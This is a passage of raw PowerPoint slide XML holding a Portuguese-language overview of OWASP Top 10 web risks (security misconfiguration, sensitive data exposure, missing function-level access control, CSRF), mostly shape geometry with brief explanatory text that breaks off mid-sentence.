                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A5 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Configuração</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Incorreta</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Segurança</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5086692"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>Muitas aplicações </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>web </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>não protegem devidamente os dados sensíveis, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>tais como </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>cartões de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>crédito, IDs fiscais </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>credenciais </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>de autenticação. Os atacantes podem roubar ou modificar esses dados desprotegidos com o propósito de realizar fraudes de cartões de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>crédito, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>roubo de identidade, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>ou </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>outros crimes. Os dados sensíveis merecem proteção extra como criptografia no armazenamento ou em trânsito, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>bem como precauções </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>especiais quando trafegadas pelo </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>navegador.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Freeform 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5010218"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A6 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>Exposição de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
                <a:t>Dados Sensíveis</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Freeform 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="5889673"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>A maioria das </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>aplicações web verificam os direitos de acesso </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>em </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>nível de função antes de tornar essa funcionalidade visível na interface do usuário. No </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>entanto</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>, as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>aplicações</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>precisam</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>executar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> as </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>mesmas</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>verificações</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>controle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>acesso</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> no </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>servidor</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>quando</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>cada</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>função</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>é</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>invocada</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>. Se estas requisições não forem verificadas, os atacantes serão capazes de forjar as requisições, com o propósito de acessar a funcionalidade </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sem autorização adequada.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Freeform 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="5813199"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A7 – </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Falta</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Função</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>para</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Controle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> do </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Nível</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t> de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
                <a:t>Acesso</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="6692655"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2" rIns="66441" bIns="48153" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>Um ataque CSRF força a vítima que possui uma sessão ativa em um navegador a enviar </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>uma requisição HTTP forjada, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>incluindo o cookie da </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>sessão da vítima e qualquer outra informação de autenticação incluída na </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>sessão, a uma aplicação </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>web </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t>vulnerável. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>Esta</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>falha</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>permite</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>ao</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>atacante</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>forçar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>navegador</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> da </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>vítima</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>criar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>requisições</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>que</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" err="1"/>
                <a:t>aplicação</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
